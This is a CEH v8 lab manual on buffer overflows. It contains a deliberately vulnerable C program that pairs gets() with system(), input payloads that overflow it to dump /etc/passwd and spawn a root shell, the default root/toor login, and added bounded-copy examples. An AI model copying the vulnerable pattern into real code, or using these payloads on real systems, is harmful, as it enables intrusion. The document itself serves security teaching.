Ceh v8 labs module 18 buffer overflow

Jan 19, 2015
Page 1: Ceh v8 labs module 18 buffer overflow

CEH Lab Manual

Buffer Overflow

Module 18


Module 18 - Buffer Overflow

Buffer Overflow Attack

In a buffer overflow, while writing data to a buffer, the buffer's boundary is overrun and adjacent memory is overwritten.

Lab Scenario

Source: http://www.ic.unicamp.br/~stolfi/urna/buffer-oflow

Hackers continuously look for vulnerabilities in software or a computer to break into the system by exploiting these vulnerabilities.

The most common vulnerability often exploited is the buffer overflow, where a program fails either to allocate sufficient memory for an input string or to test whether the length of the string lies within its valid range. A hacker can exploit such a weakness by submitting an extra-long input to the program, designed to overflow its allocated input buffer (temporary storage area) and modify the values of nearby variables, cause the program to jump to unintended places, or even replace the program's instructions with arbitrary code.

If the buffer overflow bug lies in a network service daemon, the attack can be carried out by directly feeding the poisonous input string to the daemon. If the bug lies in an ordinary system tool or application with no direct network access, the hacker attaches the poisonous string to a document or an email which, once opened, launches a passive buffer overflow attack. Such attacks are equivalent to the hacker logging into the system with the same user ID and privileges as the compromised program.

Buffer overflow bugs are especially common in C programs, since that language does not provide built-in array bounds checking and uses a final null byte to mark the end of a string instead of keeping its length in a separate field. To make things worse, C provides many library functions, such as strcpy, strcat and gets, which copy strings without any bounds checking.

As an expert ethical hacker and penetration tester, you must have sound knowledge of when and how buffer overflows occur. You must understand stack-based and heap-based buffer overflows, perform penetration tests for detecting buffer overflows in programs, and take precautions to protect programs from buffer overflow attacks.

Lab Objectives

The objective of this lab is to help students learn and perform a buffer overflow attack that reads the password file and obtains a command shell.

In this lab, you need to:

■ Prepare a script to overflow a buffer

■ Run the script against an application


Ethical Hacking and Countermeasures Copyright © by EC-Council. All Rights Reserved. Reproduction is Strictly Prohibited.

CEH Lab Manual Page 902


■ Perform penetration testing for the application

■ Enumerate a password list

Lab Environment

■ A computer running Windows Server 2012 as host machine

■ A virtual machine running BackTrack 5 R3

■ A web browser with Internet access

■ Administrative privileges to run tools

Lab Duration

Time: 20 Minutes

Overview of Buffer Overflow

Buffer overflow is an anomaly where a program, while writing data to a buffer, overruns the buffer's boundary and overwrites adjacent memory. This is a special case of a violation of memory safety. Buffer overflows can be triggered by inputs that are designed to execute code or alter the way the program operates. This may result in erratic program behavior, including memory access errors, incorrect results, a crash, or a breach of system security. Thus, they are the basis of many software vulnerabilities and can be maliciously exploited.

Lab Tasks

Recommended labs to assist you in buffer overflow:

■ Enumerating Passwords in "Default Password List"

  o Write the Code
  o Compile the Code
  o Execute the Code
  o Perform Buffer Overflow Attack
  o Obtain Command Shell

Lab Analysis

Analyze and document the results related to the lab exercise. Give your opinion on your target's security posture and exposure.

Note: This lab can be demonstrated using the BackTrack virtual machine.

PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.


Buffer Overflow Example

In a buffer overflow, while writing data to a buffer, the buffer's boundary is overrun and adjacent memory is overwritten.

Lab Scenario

In computer security and programming, a buffer overflow, or buffer overrun, vulnerability appears where an application needs to read external information such as a character string, the receiving buffer is relatively small compared to the possible size of the input string, and the application doesn't check the size. A buffer allocated at run time may be placed on the stack, which keeps the information for executing functions, such as local variables, argument variables, and the return address. The overflowing string can alter such information. This also means that an attacker can change the information as he or she wants to. For example, the attacker can inject a series of machine language instructions as a string and then cause that attack code to execute by changing the return address to the address of the attack code. The ultimate goal is usually to get control of a privileged shell by such methods.

Programming languages commonly associated with buffer overflows include C and C++, which provide no built-in protection against accessing or overwriting data in any part of memory and do not automatically check that data written to an array (the built-in buffer type) is within the boundaries of that array. Bounds checking can prevent buffer overflows.

As a penetration tester, you should be able to implement protection against stack-smashing attacks. You must be aware of all the defensive measures for buffer overflow attacks. You can prevent buffer overflow attacks by implementing run-time checks (for example, the stack canaries gcc inserts with -fstack-protector), address obfuscation, randomizing the location of functions in libc, analyzing static source code, marking the stack as non-executable, and using type-safe languages such as Java, ML, etc.

Lab Objectives

The objective of this lab is to help students learn and perform a buffer overflow that reads the password file and obtains a command shell.

In this lab, you need to:


■ Prepare a script to overflow a buffer

■ Run the script against an application

■ Perform penetration testing for the application

■ Enumerate a password list

Lab Environment

■ A computer running Windows Server 2012 as host machine

■ A virtual machine running BackTrack 5 R3

■ A web browser with Internet access

■ Administrative privileges to run tools

Lab Duration

Time: 20 Minutes

Overview of Buffer Overflow

Buffer overflow takes place when data written to a buffer, because of insufficient bounds checking, corrupts the data values in memory addresses adjacent to the allocated buffer. Most often this occurs when copying strings of characters from one buffer to another.

When the following program is compiled and run, it assigns a block of memory 11 bytes long to hold the string. The strcpy function then copies the 13-byte string "DDDDDDDDDDDD" (12 characters plus the terminating null) into that buffer, exceeding its 11-byte size and resulting in a buffer overflow.

Index:   0 1 2 3 4 5 6 7 8 9 10 11 12
String:  D D D D D D D D D D D  D  \0     (13 bytes written by strcpy)
Buffer:  A A A A A A A A A A \0           (11 bytes allocated; bytes 11 and 12 land in adjacent memory)

Buffer Overflow Example Code

    #include <stdio.h>
    #include <string.h>

    int main(int argc, char **argv)
    {
        char Buffer[11] = "AAAAAAAAAA";     /* 10 characters + NUL fill the buffer exactly */
        strcpy(Buffer, "DDDDDDDDDDDD");     /* 12 characters + NUL: two bytes too many, no bounds check */
        printf("%s\n", Buffer);
        return 0;
    }

This type of vulnerability is prevalent in UNIX- and NT-based systems.
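The diagram above shows the 13-byte string landing in an 11-byte buffer but does not show what happens to the memory it lands on. The following program is an added example (not part of the lab manual) that makes the "adjacent memory" concrete: it places a second field directly after the 11-byte buffer, performs the same unchecked 13-byte copy, and reports how many bytes spilled into the neighbor; beside it is the bounds-checked copy the text calls for. The struct, its field names and the neighbor's contents are assumptions made for the demonstration, and the unchecked copy is done as a memcpy over the whole struct so the program stays well-defined while writing exactly the bytes strcpy would write.

```c
#include <stdio.h>
#include <string.h>
#include <stddef.h>

/* Two objects laid out back to back, as in the lab diagram: the 11-byte buffer
 * and whatever happens to follow it in memory. Both are char arrays, so
 * 'neighbor' starts at offset 11 with no padding. (Assumed layout for the demo.) */
struct frame {
    char buffer[11];    /* room for 10 characters plus the terminating NUL */
    char neighbor[8];   /* the "adjacent memory" that an overflow clobbers */
};

/* Unchecked copy, equivalent to strcpy(f->buffer, src): copies src and its NUL
 * with no regard for sizeof f->buffer. Done as a memcpy over the whole struct
 * so the demonstration stays defined behaviour while writing the same bytes.
 * Returns how many bytes landed outside 'buffer'. */
size_t unchecked_copy(struct frame *f, const char *src)
{
    size_t n = strlen(src) + 1;
    if (n > sizeof *f)          /* keep the model inside the struct; a real strcpy has no such clamp */
        n = sizeof *f;
    memcpy(f, src, n);
    return n > sizeof f->buffer ? n - sizeof f->buffer : 0;
}

/* Bounds-checked copy: refuses any string that does not fit together with its NUL.
 * Returns 0 on success, -1 when the input is rejected and dst is left untouched. */
int checked_copy(char *dst, size_t dstsize, const char *src)
{
    size_t n = strlen(src);
    if (n + 1 > dstsize)
        return -1;
    memcpy(dst, src, n + 1);
    return 0;
}

int main(void)
{
    struct frame f;
    memset(&f, 0, sizeof f);
    strcpy(f.neighbor, "secret");       /* fits: 6 chars + NUL in 8 bytes (constructed sample data) */
    strcpy(f.buffer, "AAAAAAAAAA");     /* fits: 10 chars + NUL in 11 bytes */
    printf("before: neighbor=\"%s\"\n", f.neighbor);

    size_t spilled = unchecked_copy(&f, "DDDDDDDDDDDD");   /* 12 D's + NUL = 13 bytes */
    printf("after unchecked copy: %zu bytes spilled, neighbor=\"%s\"\n", spilled, f.neighbor);

    char safe[11];
    if (checked_copy(safe, sizeof safe, "DDDDDDDDDDDD") != 0)
        printf("checked copy: rejected 12-character input for an 11-byte buffer\n");
    return 0;
}
```

After the unchecked copy the neighbor's first byte is a 'D' and its second is the copied NUL, so the "secret" it held is gone; the checked version returns -1 and never writes. The check is `n + 1 > dstsize`, not `n > dstsize`: forgetting the room for the terminator is the classic off-by-one that still overruns by a single byte.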

Lab Tasks

1. Launch your BackTrack 5 R3 virtual machine.

2. At the bt login prompt, type root and press Enter. Type the password toor and press Enter to log in to the BackTrack virtual machine.

TASK 1: Write the Code


FIGURE 1.1: BackTrack Login

3. Type startx to launch the GUI.

Note: A buffer overflow occurs when a program or process tries to store more data in a buffer than it was allocated to hold.

FIGURE 1.2: BackTrack GUI Login (startx command)

4. The BackTrack 5 R3 GUI desktop opens, as shown in the following screenshot.

Note: Code entered in gedit is case-sensitive.


F IG U R E 1.3: BackTrack 5 R3 Desktop

5. Select the BackTrack Applications menu, and then select Accessories > gedit Text Editor.

Note: Programming languages commonly associated with buffer overflows include C and C++.

FIGURE 1.4: Launching gedit Text Editor

6. Enter the following code in gedit Text Editor. (Note: the code is case-sensitive. Both buffers come from malloc, so the overflow you will trigger is heap-based: name and command are adjacent heap chunks, and a long name runs straight into command.)

    #include <stdio.h>
    #include <stdlib.h>
    #include <stdint.h>

    /* Deliberately vulnerable lab program. name (10 bytes) and command (128 bytes)
     * are adjacent heap chunks; gets() performs no bounds check, so a long name
     * spills into command, which is then handed to system(). gets() was removed
     * in C11: BackTrack's gcc accepts it with a warning, a modern gcc needs
     * -std=gnu89 to compile this listing. */
    int main(void)
    {
        char *name;
        char *command;

        name = (char *)malloc(10);
        command = (char *)malloc(128);

        /* addresses printed in decimal, as in the lab screenshots */
        printf("address of name is: %lu\n", (unsigned long)(uintptr_t)name);
        printf("address of command is: %lu\n", (unsigned long)(uintptr_t)command);
        printf("Difference between address is: %ld\n", (long)(command - name));

        printf("Enter your name: ");
        gets(name);                 /* unbounded read: the overflow happens here */
        printf("Hello %s\n", name);
        system(command);            /* runs whatever now sits at command */
        return 0;
    }

FIGURE 1.5: Writing code for execution

7. Now save the program by selecting File > Save As > root, or simply click Save as shown in the following screenshot, saving it as buffer.c.


TASK 2: Compile the Code

8. Now launch the command terminal and compile the code by running:

    gcc buffer.c -o buffer

Note: No tool can completely solve the problem of buffer overflows, but tools can surely decrease the probability of stack-smashing attacks.


    root@bt:~# gcc buffer.c -o buffer

FIGURE 1.7: BackTrack compiling the code

9. gcc reports warnings for the listing as the lab writes it (implicit declaration of malloc, %d used with pointer arguments, and "the gets function is dangerous and should not be used"). Ignore them; they do not stop the binary from being produced.

    root@bt:~# gcc buffer.c -o buffer
    buffer.c: In function 'main':
    buffer.c:6: warning: incompatible implicit declaration of built-in function 'malloc'
    buffer.c:8: warning: format '%d' expects type 'int', but argument 2 has type 'char *'
    buffer.c:9: warning: format '%d' expects type 'int', but argument 2 has type 'char *'
    buffer.c:10: warning: format '%d' expects type 'int', but argument 2 has type 'long int'
    /tmp/ccx6Y3vl.o: In function `main':
    buffer.c:(.text+0x90): warning: the `gets' function is dangerous and should not be used.
    root@bt:~#

FIGURE 1.8: BackTrack compiler warnings

TASK 3: Execute the Code

10. To execute the program, type ./buffer


    root@bt:~# ./buffer
    address of name is: 20144144
    address of command is: 20144176
    Difference between address is: 32
    Enter your name:

Note: An executable program on a disk contains a set of binary instructions to be executed by the processor.

FIGURE 1.9: BackTrack Executing Program

11. Type any name in the input field and press Enter; here, Jason is used as an example.

Note: Buffer overflows work by manipulating pointers (including stored addresses).

FIGURE 1.10: Input Field

12. Hello Jason should be printed.


    root@bt:~# ./buffer
    address of name is: 20144144
    address of command is: 20144176
    Difference between address is: 32
    Enter your name: Jason
    Hello Jason
    root@bt:~#

FIGURE 1.11: Hello Jason

TASK 4: Perform Buffer Overflow Attack

13. Now, overflow the buffer and execute the listed system commands.

14. Run the program again by typing ./buffer.

15. Type 12345678912345678912345678912345cat /etc/passwd in the input field. The 32 filler characters equal the printed difference between the two addresses, so the text that follows them is written to the first byte of command, and system(command) runs it.

16. You can view a printout of the password file.

    root@bt:~# ./buffer
    address of name is: 17747984
    address of command is: 17748016
    Difference between address is: 32
    Enter your name: 12345678912345678912345678912345cat /etc/passwd
    Hello 12345678912345678912345678912345cat /etc/passwd
    root:x:0:0:root:/root:/bin/bash
    daemon:x:1:1:daemon:/usr/sbin:/bin/sh
    bin:x:2:2:bin:/bin:/bin/sh
    sys:x:3:3:sys:/dev:/bin/sh
    sync:x:4:65534:sync:/bin:/bin/sync
    games:x:5:60:games:/usr/games:/bin/sh
    man:x:6:12:man:/var/cache/man:/bin/sh
    lp:x:7:7:lp:/var/spool/lpd:/bin/sh
    mail:x:8:8:mail:/var/mail:/bin/sh
    news:x:9:9:news:/var/spool/news:/bin/sh
    uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
    proxy:x:13:13:proxy:/bin:/bin/sh
    www-data:x:33:33:www-data:/var/www:/bin/sh
    backup:x:34:34:backup:/var/backups:/bin/sh
    list:x:38:38:Mailing List Manager:/var/list:/bin/sh
    irc:x:39:39:ircd:/var/run/ircd:/bin/sh
    gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
    libuuid:x:100:101::/var/lib/libuuid:/bin/sh

FIGURE 1.12: Dumping the password file through the overflow

TASK 5: Obtain Command Shell

17. Now, obtain a command shell.

18. Run the program again with ./buffer and type 12345678912345678912345678912345/bin/sh in the input field.

Note: Buffer overflow vulnerabilities typically occur in code where the programmer has not accurately predicted the size of the input the buffer will receive.


    root@bt:~# ./buffer
    address of name is: 24616976
    address of command is: 24617008
    Difference between address is: 32
    Enter your name: 12345678912345678912345678912345/bin/sh
    Hello 12345678912345678912345678912345/bin/sh
    sh-4.1#
    sh-4.1#
    sh-4.1#

FIGURE 1.13: Executing 12345678912345678912345678912345/bin/sh

19. Type exit in the shell konsole, or close the program.
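Steps 13 to 18 work because the program printed "Difference between address is: 32": the 32 filler characters carry the write from name up to the first byte of command, and everything after them is what system() executes. The program below is an added example (not part of the lab manual) that reproduces that layout deterministically inside one array, never calls system(), builds the payload from a chosen offset and command, and contrasts the gets() behaviour with an fgets()-style bounded read. The 32-byte spacing is the value measured by the lab's own program on BackTrack (64-bit glibc) and is assumed here; the arena size, the struct and the function names are also assumptions made for the demonstration.

```c
#include <stdio.h>
#include <string.h>

/* Layout observed in the lab: malloc(10) followed by malloc(128) in 64-bit
 * glibc puts 'command' exactly 32 bytes after 'name' (the lab program prints
 * both addresses and their difference). The model reproduces that spacing in
 * one array so the demonstration is deterministic and never calls system(). */
#define NAME_TO_COMMAND 32      /* assumed from the lab's printed difference */
#define ARENA_SIZE 256          /* assumed: big enough for both regions plus the payload */

struct heap_model {
    char arena[ARENA_SIZE];
    char *name;      /* arena + 0  : stands in for the malloc(10) region */
    char *command;   /* arena + 32 : stands in for the malloc(128) region */
};

void heap_model_init(struct heap_model *h)
{
    /* Fresh heap pages are zero-filled, which is why system(command) before
     * any overflow runs an empty command and prints nothing. */
    memset(h->arena, 0, sizeof h->arena);
    h->name = h->arena;
    h->command = h->arena + NAME_TO_COMMAND;
}

/* Build the lab's payload: 'offset' filler bytes (the lab types the digits 1-9
 * repeating) followed by the command. The filler must contain no NUL byte or
 * gets() would stop copying early. Returns the payload length, or 0 if it
 * does not fit in 'out'. */
size_t build_payload(size_t offset, const char *cmd, char *out, size_t outsize)
{
    static const char digits[] = "123456789";
    size_t cmdlen = strlen(cmd);
    if (offset + cmdlen + 1 > outsize)
        return 0;
    for (size_t i = 0; i < offset; i++)
        out[i] = digits[i % 9];
    memcpy(out + offset, cmd, cmdlen + 1);
    return offset + cmdlen;
}

/* Vulnerable read, modelling gets(name): copies the whole line with no regard
 * for the 10 bytes that belong to 'name'. Returns what system() would receive. */
const char *vulnerable_read(struct heap_model *h, const char *line)
{
    size_t n = strlen(line) + 1;
    if (n > sizeof h->arena)        /* keep the model in bounds; the real gets() has no such limit */
        n = sizeof h->arena;
    memcpy(h->name, line, n);
    return h->command;
}

/* Hardened read, modelling fgets(name, 10, stdin): at most 9 characters plus
 * the NUL land in 'name', so 'command' is untouched. Returns what system()
 * would receive. */
const char *hardened_read(struct heap_model *h, const char *line)
{
    snprintf(h->name, 10, "%s", line);
    return h->command;
}

int main(void)
{
    struct heap_model h;
    char payload[128];
    build_payload(NAME_TO_COMMAND, "cat /etc/passwd", payload, sizeof payload);
    printf("payload: %s\n", payload);

    heap_model_init(&h);
    printf("gets():  system(\"%s\")\n", vulnerable_read(&h, payload));

    heap_model_init(&h);
    printf("fgets(): system(\"%s\")  name=\"%s\"\n", hardened_read(&h, payload), h.name);
    return 0;
}
```

With the vulnerable read, command reads "cat /etc/passwd", exactly what the lab's screenshot shows being executed; with the bounded read, name holds "123456789" and command is still empty. Two things the lab's output does not show: the eight bytes immediately before command are that chunk's glibc size field, which the filler overwrites with "12345678", and the program only survives that because it never calls malloc or free again. The bounded read keeps command intact, but the real fix is not to hand attacker-reachable memory to system() at all.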

Lab Analysis

Analyze and document the results related to the lab exercise. Give your opinion on your target's security posture and exposure.

Note: Code scrutiny (writing secure code) is the best possible solution to buffer overflow attacks.

Tool/Utility       Information Collected / Objectives Achieved
-----------------  ---------------------------------------------------------
Buffer Overflow    ■ Address of name is: 24616976
                   ■ Address of command is: 24617008
                   ■ Difference between address is: 32
                   ■ Enter your name: 12345678912345678912345678912345/bin/sh
                   ■ Hello 12345678912345678912345678912345/bin/sh
                   ■ sh-4.1#


Questions

1. Evaluate various methods to prevent buffer overflow.

2. Analyze how to detect run-time buffer overflow.

3. Evaluate and list the common causes of buffer-overflow errors under .NET languages.

Internet Connection Required

☐ Yes  ☑ No

Platform Supported

☑ Classroom  ☑ iLabs
